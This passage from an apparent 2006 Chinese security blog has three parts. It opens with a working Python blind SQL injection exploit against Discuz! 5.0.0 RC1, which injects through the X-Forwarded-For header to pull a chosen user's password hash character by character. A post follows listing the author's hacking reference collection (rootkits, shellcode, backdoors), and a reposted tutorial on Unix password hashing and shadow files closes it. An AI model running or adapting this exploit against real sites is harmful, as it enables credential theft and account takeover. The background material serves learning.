from urlparse import urlparse
from time import sleep

def  injection (lenthofpass, realurl, path):
    sys.stdout.write('[+] The uid=' + sys.argv[2] + ' password hash is: ')
    for num in range(1,lenthofpass+1):
        ran = range(97, 123)
        for a in range(48, 58): ran.append(a)

        for i in ran:

            query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            #print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request("POST", path + "logging.php?action=login&",data , header)
            #sleep(1)
            response = http.getresponse()
            re1 = response.read()
            if re1.find('SELECT') == -1:
                print '\n[-] Unvulnerable host'
                print '[-] Exit..'
                sys.exit(1);

            elif re1.find('ip3') == -1:
                sys.stdout.write(chr(i))
                http.close()
                #sleep(1)
                break

            #print re1
            #print '-----------------------------------------------'
            http.close()
            #sleep(1)
    sys.stdout.write('\n')

def main ():
    print 'Discuz! 5.0.0 RC1 SQL injection exploit'
    print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    if len(sys.argv) == 3:
        url = urlparse(sys.argv[1])
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2]
    else:
        print "Usage: %s  " % sys.argv[0]
        print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)

    lenth = 32
    print '[+] Connect %s' % url[1]
    print '[+] Trying'
    print '[+] Plz wait a long long time'

    injection(lenth, url, u)

    print '[+] Finished'

if __name__ == '__main__': main()

btw: 我一直认为,0day不是最重要的,重要的是懂得其理
我写的这个Code就像PoC的字面意思一样,只不过是个证明而已.所以也没必要写成最优代码.这个code我只本地测试过.远程测试不成功是很正常的.当然,如果懂了原理,写个能用的exploit还是很方便的.否则连为什么不成功都不清不楚,也只有郁闷着了.

wofeiwo 2006-09-15 21:45 发表评论

要回学校了

wofeiwo — Sun, 27 Aug 2006 10:34:00 GMT

整理整理电脑.看看带点啥去学校.
除了研究用的exp,一些必备的tools和wares,
最放不下的是一堆技术文档...可惜只有个u盘.放不下太多
拾掇拾掇.整理一点带过去吧...

DOCUMENTS
├─Win32
│      API32.CHM
│      Bypassing PatchGuard on Windows x64.rar
│      defeating-w2k3-stack-protection.rar
│      greatdong_Undocumented Windows NT 中文版.rar
│      Hook 系统服务隐藏端口.mht
│      JIURL PE 格式学习总结（一）-- PE文件概述.mht
│      JIURL PE 格式学习总结（三）-- PE文件中的输入函数.mht
│      JIURL PE 格式学习总结（二）-- PE文件中的输出函数.mht
│      JIURL PE 格式学习总结（四）-- PE文件中的资源.mht
│      Raising The Bar For Windows Rootkit Detection.mht
│      The PE file format.rar
│      Undocumented Windows 2000 Secrets--CHS.rar
│      WIN2000 网络命令手册.rar
│      Win32 API 注册表类的编制以及使用　文章查看【关注VC MFC C# _NET Windows 软件开发技术软件工程项目管理的开发人员个人专栏】.mht
│      Windows CE API机制初探.mht
│      Windows CE初探.mht
│      Windows 核心编程.rar
│      windows2000Driving.rar
│      Windows内核调试器原理浅析.mht
│      Windows异常处理流程.mht
│      Windows的自启动方式.mht
│      Windows程序设计.chm
│      WinInfo--CoolICE WebLog.mht
│      win远程终端.rar
│      [转载]A new way to bypass Windows heap protections - powered by phpwind_net.mht
│      [转载]Hook初步 - EvilOctal Security Team - E_S_T.mht
│      [转载]IIS5 ISAPI Extension Back Door - powered by phpwind_net.mht
│      [转载]Kernel-mode backdoors for Windows NT - EvilOctal Security Team - E_S_T.mht
│      [转载]PE引入表修改实战 - EvilOctal Security Team - E_S_T.mht
│      [转载]Win32PE病毒入门教程 - EvilOctal Security Team - E_S_T.mht
│      [转载]Window 消息大全使用详解 - EvilOctal Security Team - E_S_T.mht
│      [转载]Windows 2000下Api函数的拦截分析 - powered by phpwind_net.mht
│      [转载]Windows下的函数hook技术 - powered by phpwind_net.mht
│      『 SafeChina Security Forums 』 - ==『编程之道』 - 内核级文件读写流程(zt).mht
│      一种新的穿透防火墙的数据传输技术.mht
│      克隆管理员帐号的方法.mht
│      内核级利用通用Hook函数方法检测进程.mht
│      利用伪造内核文件来绕过IceSword的检测.mht
│      在NT系列操作系统里让自己“消失”.mht
│      在Win2000-XP上安静地替换正在使用的系统文件.mht
│      挂钩Windows API.mht
│      木马编程相关杂谈.mht
│      木马隐藏端口的一种方法.mht
│      深入剖析EFS.mht
│      管理员组获取系统权限的完美解决方案.mht
│      绕过Windows Rootkit检测系统.mht
│      获取Windows 系统的内核变量.mht
│
├─Web
│      DHTML 手册.rar
│      AJAX开发简略.rar
│      ADO210.chm
│      behavior55.chm
│      css2.chm
│      mysql5.chm
│
├─Server
│      ApacheManual.rar
│      FTP协议的分析和扩展.mht
│      Hackproofing Oracle Application Server.mht
│      zues_user_manual.rar
│      这是我前段学vsftpd时整理的，有错的地方，大伙指点啊 - China Linux Forum.mht
│      Apache PHP MySQL Zend GD OpenSSL vsftpd ___ 完全编译安装 - China Linux Forum.mht
│      Chrooting 后台服务和系统程序指导.mht
│      proftp学习笔记－配置全功略 - China Linux Forum.mht
│
├─Python
│      diveintopython-html-zh-cn.tbz
│      mod_python manual-all.rar
│      OReilly-ProgrammingPython2ndEd.rar
│      OReilly-PythonPocketReference2ndEd2001.rar
│      OReilly-PythonProgrammingonWin32.rar
│      OReilly.Python.in.a.Nutshell.2nd.Edition.Jul.2006.rar
│      python_2_4_tut.rar
│      thinkinginpython.rar
│
├─PHPZend
│      Exceed PHP Club - PHP有多线程功能没.mht
│      extending-php.pdf
│      Extending_and_Embedding_PHP.zip
│      milw0rm ~ View topic - php local underflow could lead to arbitary code execution.mht
│      PHP 扩展写作第一部 - powered by Discuz!.mht
│      PHP.mht
│      php_manual_zh.chm
│      PHP技术文档 - PHP扩展写作第二部 - powered by Discuz!.mht
│      smarty_manual.zip
│      Zend Technologies - Extension Writing Tutorials - Part I Introduction to PHP and Zend.mht
│      Zend Technologies - Extension Writing Tutorials - Part II Parameters, Arrays, and ZVALs.mht
│      Zend Technologies - Extension Writing Tutorials - Part III Resources.mht
│      Zend_Optimizer_User_Guide.pdf
│      [转载]扩展你的PHP之入门篇 - EvilOctal Security Team - E_S_T.mht
│      扩展你的PHP之入门篇.mht
│      杂谈PHP4内核Hacking.mht
│      由PHP imap函数绕过安全模式及open_basedir限制漏洞想到的 - MICROIE.mht
│      编写自己的php扩展函数.mht
│
├─Overflow&Shellcode
│      AIX PowerPC体系结构及其溢出技术学习笔记.mht
│      Bruteforcing the retaddr in local bof exploits[译文].mht
│      C++程序的缓冲区溢出攻击.mht
│      heaptut-chinese.txt
│      No.Starch.Press.Hacking.The.Art.Of.Exploitation.eBook-LiB.chm
│      One Exploit Play More OS.mht
│      Ph4nt0m Security Team BBS - [原创]由python的realpath漏洞小议realpath()函数.mht
│      shellcode技术探讨续二.mht
│      Shellcode编写技术.mht
│      Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.rar
│      THE SHELLCODER'S HANDBOOK.rar
│      win xp-2000-2003 Connect Back shellcode for Overflow exploit 275 bytes.mht
│      win xp-2000-2003 Download File and Exec 241 bytes.mht
│      Win32平台格式化串漏洞利用技术.mht
│      Windows 2000缓冲区溢出入门.mht
│      windows POSIX 子系统权限提升漏洞分析以及利用(v 1_0).mht
│      Windows Xp Sp2溢出保护.mht
│      [原创]ASM编写通用Win32系统ShellCode for MASM32 邪恶八进制信息安全团队官方技术讨论组 - 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
│      [原创]动态函数监控技术在缓冲区溢出检测中的应用 - EvilOctal Security Team - E_S_T.mht
│      [原创]菜鸟溢出手册 - EvilOctal Security Team - E_S_T.mht
│      [原创翻译]使用windows系统调用编写shellcode - EvilOctal Security Team - E_S_T.mht
│      [转载]API函数地址的获取 - EvilOctal Security Team - E_S_T.mht
│      [转载]return into libc attacks used to bypass non-executable stacks - EvilOctal Security Team - E_S_T.mht
│      [转载]shellcode技术探讨续一 - EvilOctal Security Team - E_S_T.mht
│      [转载]怎样写远程缓冲区溢出漏洞利用程序 - EvilOctal Security Team - E_S_T.mht
│      『 SafeChina Security Forums 』 - ==『编程之道』 - Windows 2000缓冲区溢出入门 (zt).mht
│      『 SafeChina Security Forums 』 - ==『编程之道』 - 从堆栈查找Kernel32_DLL基址.mht
│      一种小堆(heap)溢出的另类利用方法.mht
│      一种新的Heap区溢出技术分析.mht
│      关于Windows下ShellCode编写的一点思考.mht
│      总结windows下堆溢出的三种利用方式.mht
│      栈溢出攻击技术.rar
│      纯字母shellcode [proof].rar
│      通用ShellCode深入剖析.mht
│      高级返回库函数exploit代码实现.mht
│
├─Other
│      nc使用技巧.mht
│      RSA算法基础-实践.mht
│      VPN与网络安全.rar
│      vpn过程解析.rar
│      [转载]CISCO命令全集 - powered by phpwind_net.mht
│      [转载]SSL是如何工作的 - EvilOctal Security Team - E_S_T.mht
│      [转载]探测远程主机操作系统指纹的全新技术 - EvilOctal Security Team - E_S_T.mht
│      [转载]有关无线安全与黑客的话题 - EvilOctal Security Team - E_S_T.mht
│      了解你的敌人：了解VMware.mht
│      再谈防火墙及防火墙的渗透.mht
│      在TCP三次握手后插入伪造的TCP包.mht
│      基于ARP欺骗的TCP伪连接D_o_S.mht
│      嵌入式系统及实时软件开发.rar
│      应用层截包方案与实现.mht
│      慧眼巧识Honeypot[原创文档].mht
│      数据恢复与硬盘数据结构 - 飞客数据恢复中心.mht
│      有关无线安全与黑客的话题.mht
│      深入理解计算机系统.rar
│      电话反窃听、防窃听的技术与设备.mht
│      组合语言之艺术.chm
│      网络安全防范体系及设计原则.mht
│      自己动手写操作系统完全版.rar
│      自己动手写造作系统(源代码)随书光盘.rar
│
├─nix
│      Digital Press - UNIX for OpenVMS Users, Third Edition.rar
│      freebsd_book_cht.zip
│      Getting Started with OpenVMS.rar
│      inside_unix_defense.rar
│      OpenVMS技术专辑_技巧_密码的破解,第1页 - SOHU社区.mht
│      OpenVMS操作系统专辑_OpenVMS介绍,第1页 - SOHU社区.mht
│      solaris_learning.zip
│      Unix编程应用问答中文版(2005-12-10外发版).txt
│      VMS 作業系統使用者指引.mht
│      VMSFaq.rar
│      [转载]HP小型机的信息的命令集(完全版) - powered by phpwind_net.mht
│      在PC上安装模拟器运行OpenVMS操作系统,第1页 - SOHU社区.mht
│
├─Linux
│      abs-guide-3.7-cnhtm.tar.gz
│      apt-howto.pdf
│      Before main() 分析.mht
│      Book_Linux1.0.rar
│      CSDN技术中心 LINUX动态链接库高级应用.mht
│      ELF文件格式(中文)(一).mht
│      ELF文件格式(中文)(三).mht
│      ELF文件格式(中文)(二).mht
│      LFS-6.1.1.chm
│      Linux C 函数.chm
│      Linux Kernel chs.chm
│      Linux on-the-fly kernel patching without LKM.mht
│      linux-2_6内核升级文档 - icekernel的专栏.mht
│      linux内核0.11完全注释-1.9.5.rar
│      linux内核溢出研究系列(1)--通用shellcode篇 - China Linux Forum.mht
│      Linux内核溢出研究系列(2) - kmalloc溢出技术 - China Linux Forum.mht
│      Linux内核漏洞浅析.mht
│      linux基础.rar
│      linux操作系统C语言编程入门.rar
│      Linux编程命令详解.rar
│      Ph4nt0m Security Team BBS - Advanced Exploit Techique之--frame faking技术.mht
│      Ph4nt0m Security Team BBS - Bypass Exec-shield Under Redhat.mht
│      Ph4nt0m Security Team BBS - [讨论]shared library hijacking.mht
│      Ph4nt0m Security Team BBS - 让shellcode在_data执行的一个例子,呵呵.mht
│      Ph4nt0m Security Team BBS - 转载：一份非常内行的Linux LVM HOWTO.mht
│      Shell_manual.rar
│      Something about burneye - China Linux Forum.mht
│      Ubuntu中文论坛  阅读主题 - Ubuntu教程 -06_08_09.mht
│      Unix Linux下常用监控和管理命令工具.mht
│      vimcdoc-1.5.0.tar.gz
│      [转载]unix c socket - EvilOctal Security Team - E_S_T.mht
│      [转载]unix多进程编程 - EvilOctal Security Team - E_S_T.mht
│      [转载]后门技术及rootkit工具－Knark分析及防范 - EvilOctal Security Team - E_S_T.mht
│      在linux平台上创建超小的ELF可执行文件.mht
│      基于内核的rookit经验[phrack61].mht
│      熟悉linux的安全和优化.rar
│      用elf-write工具写interpreter后门 - China Linux Forum.mht
│      AIX安全指南.rar
│      Gentoo Linux2006.0手册.rar
│      KDE.rar
│      Linux C高级程序员指南1.rar
│      linux command.rar
│      SuckIt-1_3a 后门程序的分析.mht
│      GCC使用指南.mht
│      Gentoo 下 LAMP 的安装和配置 - China Linux Forum.mht
│      Linux 2.6 调度系统分析.mht
│      Linux 守护进程的编程方法.mht
│      linux动态链接库搜索路径的确定--就是我的blog.mht
│      Linux守护进程的编程方法.mht
│      linux下的ldd.mht
│      Ubuntu6_06Install - UbuntuChina Wiki.mht
│      共享库注射--injectso实例.mht
│
├─HackingSkill
│      Do All in Cmd Shell.mht
│      download@cmdline--CoolICE WebLog.mht
│      HTTPd_bat--CoolICE WebLog.mht
│      IE mhtml redirection漏洞利用方法.mht
│      IIS 5_1 allows for remote viewing of source code__  There is no security ^_^.mht
│      javaphile-blind_injection_survey.rar
│      Kevin Mitnick The Art of Deception.rar
│      nsupdata_bat--CoolICE WebLog.mht
│      URL Protocol--CoolICE WebLog.mht
│      XFOCUS Security Forums - Re 如何编写协议解码函数.mht
│      [原创]对dvbbs7_1 sp1最新savepost_asp漏洞的研究和利用邪恶八进制信息安全团队官方技术讨论组 - 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
│      [转载]虚假中国银行(www_banochi_net)入侵尝试实录邪恶八进制信息安全团队官方技术讨论组 - 努力为祖国的信息安全撑起一片蓝天 - EvilOctal Security Team - E_S_T.mht
│
│
├─C&C++&C#
│      Beej网络socket编程指南.rar
│      C#完全手册.rar
│      c语言代码.mht
│      Dinkum - Standard C++ Library Reference.rar
│      More Effective C++（中文）.chm
│      Socket开发资料.rar
│
└─Assembly
        Arm指令的全中文资料.rar
        gdb_guide.rar
        KmdTutCn.chm
        PC汇编资料大全.chm
        pev.rar
        softice-help.rar
        Sorted_OEM.zip
        win32asm_lyb.rar
        [转贴]8088 汇编速查手册 - EvilOctal Security Team - E_S_T.mht
        [转载]总结进入RING0的方法 - EvilOctal Security Team - E_S_T.mht
        《NASM中文手册》PDF版.rar
        一种可以穿透还原卡和还原软件的代码.mht
        奔腾指令速查手册.mht

wofeiwo 2006-08-27 18:34 发表评论

[zt]Unix/BSD/Linux的口令机制初探

wofeiwo — Sat, 26 Aug 2006 08:31:00 GMT

1.概述

早期U N I X系统把用户口令保存在一个纯文本可读的“口令文件”中，这可能在系统管理员注意不到的情况下被截取并暴露。它也可能在一次偶然事件中泄露。
从AT&T UNIX版本6开始，Thompson 等决定采用一个不同的方式： U N I X口令采用以美国军方M - 2 0 9密码机为模型的基于旋转的算法来进行编码。这种快速算法被证明对穷尽纯文本搜索有弱点并被AT&T UNIX版本7中出现的更先进的crypt ( )库代替。
现在Unix/Linux将口令以不可读的方式保存在机器中。系统使用名为cryptographic hash的算法将口令转换成文本字符串。这个串即称为散列或者散列值。使用的算法可以有多种，但它们都是不可逆的，也就是说不能从散列值中恢复出原始口令。不同的系统，所使用的密码文件以及加密算法都可能不同。管理、维护好这些密码文件是保证系统安全的首要任务。(未特别说明，本文所有命令均在csh下以root身份运行。)

2.加密算法简介

2.1---crypt()简介---key 和 salt

在Unix/Linux下存在多种散列算法。可以通过库函数crypt()调用这些系统支持的算法。crypt()有key和salt两个参数，并返回相应的散列值。salt亦即我们常说的“盐”，它只是简单的字符串，它的长度取决于所使用的算法，不同的散列算法它有不同的取值范围。所以，即使是相同的算法，相同的原始口令，使用不同的salt，也会得到不同的加密口令。salt的目的也就是为了加大口令破解的难度，当我们使用passwd命令来修改密码时，它会随机选择一个salt. s a l t使得使用预编译字典对加密口令进行攻击变得更困难。代替为字典中每个单词做一次单独加密，攻击者现在不得不对字典中每个单词的4 0 9 6种排列进行加密和储存。在2 0年前，s a l t是作为本质上的资源障碍引入的，但现在1 2位s a l t不再被认为是一种有效的防御方法。
crypt()可以在C程序中直接调用，甚至可以用perl直接调用，(详细信息请man 3 crypt),如下例：

%perl -e 'print crypt("mypass","s1"),"\n"'
s1tROevFyi.yQ

%perl -e 'print crypt("mypass","s2"),"\n"'
s2JQ85JElCMeU

以上两例中s1、s2分别为salt 值，可以看到，相同的口令（上例中为mypass）使用不同的salt将得到不同的散列值。以上两例使用的都是DES算法，加密后的散列值将salt值作为其前缀。

2.2DES算法

由美国政府和IBM研制。所有的Linux版本和几乎所有的Unix系统都支持DES.DES实际上为一个加密算法，但是crypt(3）将之做为散列算法。普通的DES算法容许的原始口令长度为8个字符，多余的口令也接受，但是多余部分会被系统自动摒弃。但有些系统（例如HP-UX)使用DES的多次迭代来解决此问题,这样就可以使用任意长度的密码。但是使用DES加密后的口令为13个字符长。

2.3MD5算法

它是真正的散列算法。允许无限长的口令。它使用的salt空间也别DES算法大得多，所以两口令相同的可能性更小。它也通过调用crypt(3)函数实现。MD5算法使用的 salt必须以$1$开头，并以$结尾。且salt长度为8个字符。例如要用abcdef为salt 散列mypass，那么如下：

%perl -e 'print crypt("mypass","\$1\$abcdef\$"),"\n"'
$1$abcdef$nRHvewzGzJoYskdQAIEQr

注：上例中的"\n"均为转义字符。salt值为$1$abcdef$,原始密码为mypass,散列值为：$1$abcdef$nRHvewzGzJoYskdQAIEQr
MD5算法得到的散列值为31个字符长，并且都以$1$开头。

2.4其他算法：

BSDI风格的DES和Blowfish使用也比较广泛，本文将在后面会有讨论。

2.5 BSD使用的加密机制：

各种D E S很长一段时间内一直是U N I X口令加密的主要算法，但还有其他算法可以代替D E S。现代B S D系统提供了一些其他算法的应用范例。缺省情况下， FreeBSD默认使用MD5加密机制，因为MD5没有出口限制，同时也更安全于DES。DES仍然可用，只不过DES存在的目的仅仅是为了和其他UNIX系统所用的密码的向后兼容性。并且使用DES的系统也能鉴别出MD5，因为MD5所用的Hash也在DES中被使用。

O p e n B S D走得更远。其开发小组在加拿大，这样就不受美国的出口限制。O p e n B S D可以被配置成使用传统的UNIX crypt () 、比如“扩充加密”、M D 5或B l o w f i s h。M D 5由Ronald L.Rivest开发，它在RFC 1321中描述。F r e e B S D和O p e n B S D中基于M D 5的crypt ( ) 产生的口令条目包含版本号、s a l t和哈希口令，彼此之间用“ $”符号分隔。一个M D 5口令看起来如下：

$ 1 $ c a e i H Q w X $ h s K q O j r F R R N 6 K 3 2 O W K C B f 1

这里“$ 1”指明M D 5，“c a e i H Q w X”是s a l t。

B l o w f i s h由Bruce Schneier在1 9 9 3年开发，是D E S的一个快速、压缩、简单且免费的替代品]。虽然S c h n e i e r指出B l o w f i s h不适合产生单向哈希，但O p e n B S D就为这个目的使用它。B l o w f i s h版的crypt ( )使用1 2 8位s a l t，足够使最坚定的破坏者泄气。用所有可能的s a l t值进行预编译的字典将十分昂贵。其最大口令长度为7 2个字符。B l o w f i s h算法是一个由p i的十六进制数字组成的固定字符串进行初始化的。初始化的B l o w f i s h状态由s a l t和口令进行扩展，该过程重复一定的次数（该数值也被编入口令串中）。最后的B l o w f i s h口令条目是使用B l o w f i s h状态对字符串“ O r p h e a n B e h o l d e r S c r y D o u b t”加密6 4次而得到的。
加密的口令条目包含B l o w f i s h版本号、算法重复次数以及s a l t和哈希口令的连结—每个之间由“ $”字符隔开。一个编码“ 8”将声明2 5 6次循环。一个有效的B l o w f i s h口令看起来如下：

$2a$12$eIAq8PR8sIUnJlHaohxX209x9O1m2vk97LJ5dsXdmB.eXF42qjchC

在这个例子中，初始的扩展进行4 0 9 6次。给出了很大的重复次数和长的口令， B l o w f i s h加密的口令比其他基于传统D E S机制加密的口令更难被攻击。给出由这些算法改进所提供的额外安全措施后，它被应用在其他U N I X系统中只是一个时间问题了。

2.6----如何得知你的系统使用的加密算法

方法可以有很多，本人简单列举几个：

方法（1）你可以通过查看 libcrypt[._*]链接到/usr/lib下的哪些库文件来得知你的系统密码所使用的加密算法。如果链接到libcrypt*库，那么使用的为MD5,如果为libdescrypt*，就应该为DES了。具体操作如下：

%cd /usr/lib
%ls　-l　libcrypt[._]*
lrwxr-xr-x　　1　root　　wheel　　　　　　　11　Jun　　9　06:18　/usr/lib/libcrypt.a@　->
libscrypt.a
lrwxr-xr-x　　1　root　　wheel　　　　　　　12　Jun　　9　06:19　/usr/lib/libcrypt.so@　->
libscrypt.so
lrwxr-xr-x　　1　root　　wheel　　　　　　　14　Jun　　9　06:21　/usr/lib/libcrypt.so.2@　->
libscrypt.so.2
lrwxr-xr-x　　1　root　　wheel　　　　　　　13　Jun　　9　06:22　/usr/lib/libcrypt_p.a@　->
libscrypt_p.a
%

注意：在FreeBSD4.4中，从FreeBSD 4.4开始就完全由login.conf来控制所使用的加密算法，并且默认已经设置为MD5,要改为DES,只须将其中:password_format段的md5替换成des。任何使修改生效，本文后面有详细的说明。

附：我们强烈建议用户尽可能的使用MD5库而非DES.所以往往也很有必要将一些安装了DES加密算法的系统的DES库转换成MD5库，操作也很简单，只须先删除libcrypt[._*]链接，然后将它们重新链接到相应到md5库。（即以s代替des）:

Links DES MD5
----- --- ---

libcrypt.a libdescrypt.a libscrypt.a
libcrypt.so libdescrypt.so libscrypt.so
libcrypt.so.2 libdescrypt.so.2 libscrypt.so.2
libcrypt_p.a libdescrypt_p.a libscrypt_p.a

方法（2）查看/etc/login.conf中的password_format段。其值md5,des,blf分别对应MD5,DES和blowfish.
方法（3）查看密码文件/etc/passwd或者/etc/shadow(BSD 下相应为/etc/master.passwd),根据密码特征得知使用的加密算法。例如以$1$开头的为MD5,以$2$开头的为blowfish.DES没有明显的特征，但它的密码段相对较短，且均为字母，没有$之类的字符，也很容易辨别！

3.密码文件

3.1概述：

正如大家所熟悉的，Unix下都存在一个/etc/passwd文件以存放用户的密码文件，但是在不同的Unix，Linux，BSD 中它们所起的作用也不尽相同。某些Unix和Linux还使用shadow文件，但FreeBSD中相应的却为/etc/master.passwd文件。下面将对这些文件进行详细说明。

3.2/etc/passwd文件

传统的Unix中均使用该文件来存放用户密码。该文件以加密的方式保存口令，其中的口令必须通过passwd口令来生成（如果使用NIS，相应的为ypasswd）,或者从另一账号中复制过来。
P a s s w d文件中的每个条目看起来如下：
n a m e : c o d e d - p a s s w d : U I D : G I D : u s e r - i n f o : h o m e - d i r e c t o r y : s h e l l
7个域中的每一个由冒号隔开。空格是不允许的，除非在u s e r- i n f o域中使用。下面总结了
每个域的含义：

①name—给用户分配的用户名，这不是私有信息。
② c o d e d - p a s s w d—经过加密的用户口令。如果一个系统管理员需要阻止一个用户登录，则经常用一个星号（ : * :）代替。该域通常不手工编辑。用户应该使用p a s s w d命令修改他们的口令。值得注意的一点是许多最近的U N I X 产品依赖“影子口令” — 不在/ e t c / p a s s w d中保存的口令。
③ UID—用户的唯一标识号。习惯上，小于1 0 0的U I D是为系统帐号保留的。
④ G I D—用户所属的基本分组。通常它将决定用户创建文件的分组拥有权。在Red Hat L i n u x中，每个用户帐号被缺省赋予一个唯一分组。
⑤ u s e r- i n f o—习惯上它包括用户的全名。邮件系统和f i n g e r这样的工具习惯使用该域中的信息。该域也被称作G E C O S域。
⑥ home-directory—该域指明用户的起始目录，它是用户登录进入后的初始工作目录。
⑦ s h e l l—该域指明用户登录进入后执行的命令解释器所在的路径。有好几种流行的S h e l l，包括Bourne Shell (/bin/sh)，C Shell (/bin/csh)，Korn Shell (/bin/ksh)和Bash Shell( / b i n / b a s h )。注意可以为用户在该域中赋一个/ b i n / f a l s e值，这将阻止用户登录。

注意：当编辑/etc/passwd文件来建立一个新账号时，应在密码字段放一个"*"，（一些伪用户，例如daemon也如此）以避免用户未经权而使用该账号。直到你为此新建账号设置了真实密码。

3.2/etc/shadow文件

传统上，/ e t c / p a s s w d文件在很大范围内是可读的，因为许多程序需要用它来把U I D转换为用户名。例如，如果不能访问/ e t c / p a s s w d，那么ls -l命令将显示数字U I D而不是用户名。不幸的是，使用口令猜测程序，具有加密口令的可读/ e t c / p a s s w d文件表现出巨大的安全危险。多数近来的U N I X产品支持一个变通方法：影子口令文件。影子口令系统把口令文件分成两部分： / e t c / p a s s w d和影子口令文件。影子口令文件保存加密的口令；/ e t c / p a s s w d中的c o d e d - p a s s w o r d域都被置为“X”或其他替代符号。影子口令文件只能被r o o t或像p a s s w d这样的s e t _ u i d程序在需要合法访问时读取，其他所有非授权用户都被拒绝访问。习惯上，影子口令文件保存在/ e t c / s h a d o w中，尽管有些系统使用可选的路径和文件名。例如B S D系统把加密的口令保存在/ e t c / m a s t e r. p a s s w d。

/etc/shadow剖析
/ e t c / s h a d o w文件包含用户名和加密口令以及下面一些域：
(1) 上一次修改口令的日期，以从1 9 7 0年1月1日开始的天数表示。
(2) 口令在两次修改间的最小天数。口令在建立后必须更改的天数。
(3)口令更改之前向用户发出警告的天数。
(4)口令终止后帐号被禁用的天数。
(5)自从1 9 7 0年1月1日起帐号被禁用的天数。
(6)保留域。
下面是一个Red Hat Linux系统中/ e t c / s h a d o w文件的例子：

root:mGqwuvdF41bc:10612:0:99999:7:::
bin:*:10612:0:99999:7:::
daemon*:10612:0:99999:7:::
adm:*:10612:0:99999:7:::
lp*:10612:0:99999:7:::
sync:*:10612:0:99999:7:::
shutdown:*:10612:0:99999:7:::
halt:*:10612:0:99999:7:::
mail:*:10612:0:99999:7:::
news:*:10612:0:99999:7:::
uucp:*:10612:0:99999:7:::
operator:*:10612:0:99999:7:::
freebird:sdfaBh45ZiQn1llfa:10612:0:99999:7:::

缺省情况下，口令更新并不开启。于是没有口令更改前的最小天数，也没有口令必须更改的日期。口令在99 999天内必须更换的声明几乎无用，因为从现在起几乎还有2 5 0年。在口令终止前7天警告用户的声明也没用，除非选择使用口令更新。在本例中没有声明，还可以在口令终止和帐号禁用之间设置一个时间段。

在可选影子口令功能的系统中，用一条相对简单的命令设置并更新影子口令文件：p w c o n v。该命令在影子口令文件不存在的情况下创建一个新的。如果已存在一个影子文件，p w c o n v把/ e t c / p a s s w d中的新用户添加到/ e t c / s h a d o w中，把/ e t c / p a s s w d中没有的用户从影子文件中删去，并把口令从/ e t c / p a s s w d移到影子文件中。在Red Hat Linux中，p w c o n v把新的/ e t c / p a s s w d文件写到一个名为n p a s s w d的文件中，把新影子文件写到n s h a d o w中。这些新文件需要手工进行重命名或拷贝。用户可以用p w u n c o n v命令返回到不使用影子文件的情况下，它把影子文件中的信息合并回传统的口令文件中。

提示：早期的L i n u x不支持影子口令。
注意：在solaris下，必须使用隐蔽口令文件，在Linux下，如果用户安装了shadow软件也可以使用。

3.2/etc/master.passwd

在BSD下，实际的口令文件是/etc/master.passwd.,这里的密码都是简单的文本数据库，每个用户占一行，行中字段用":"隔开。/etc/master.passwd权限为0600，而/etc/passwd为0644，这就意味着任何人都人存取/etc/passwd.但只有root才能读取/etc/master.passwd.
在BSD中，/etc/master.passwd是/etc/passwd的超集，它直接生成/etc/passwd文件。所以在BSD中/etc/passwd文件总是不需要直接进行编辑。一旦运行vipw,passwd,chfn,chsh或者chpass这些命令,也是对/etc/master.passwd进行修改。并且修改后会自动生成/etc/passwd.(一同生成的还有由pwd_mkdb工具生成的/etc/master.passwd的散列表形式。)
平面文件数据库(/etc/passwd,/etc/master.passwd)都只对少量用户合适，用户一多，查找速度就慢。因此在BSD 下相应的还有两个数据库格式的散列表/etc/pwd.db和/etc/spwd.db,其权限也和上面两文件对应。每次运行chfn,passwd等命令后,pwd_mkdb都会自动修改这两个文件。

提示：若希望根据另一个FreeBSD重新构件用户列表或者从另一个FreeBSD机器移植一个用户列表，只须简单的把新的master.passwd(比如master.passwd.new)文件置于/etc/下（或/ 下），然后运行如下命令（注意先备份）：

%cp /etc/master.passwd /etc/master.passwd.bak
%pwd_mkdb -p /etc/master.passwd.new

这样/etc/master.passwd文件将被覆盖，其他三个文件也得以重建。（-p即为生成新的/etc/passwd）

注意：/etc/master.passw文件和shadow文件形式和功能都相同，但是和/etc/master.passwd不同的是,Linux下（或其他系统）使用的/etc/shadow文件并非/etc/passwd文件的超集。/etc/passwd文件也并非由/etc/shadow文件产生，需要手工维护这两个文件。

4.BSD下使用“密码过期机制”
“密码过期”意即超过规定的时间密码无效，用户必须在此之前修改密码。要实现此功能，需要修改/etc/login.conf文件，在default段中加入passwordtime=90d(或者2y,6w,24h之类的)如：

default:\
　　　　:password_format=md5:\
　　　　:copyright=/etc/COPYRIGHT:\
　　　　:welcome=/etc/motd:\
　　　　:passwordtime=24h:\

因为/etc/login.conf数据库必须编译成一个散列表，所以必须运行cap_mkdb程序，以生成此散列表，然后才能使修改生效。如下操作：

%cap_mkdb /etc/login.conf

这样，若24小时内未修改密码，登陆时将提示输入新的密码。

注意：在设置passwordtime属性时，passwd会在/etc/master.passwd的第六字段写入最后一次修改密码的时间。
/etc/login.conf在密码及其他设置方面还有很多值得使用的地方，不妨man 看看。

后记

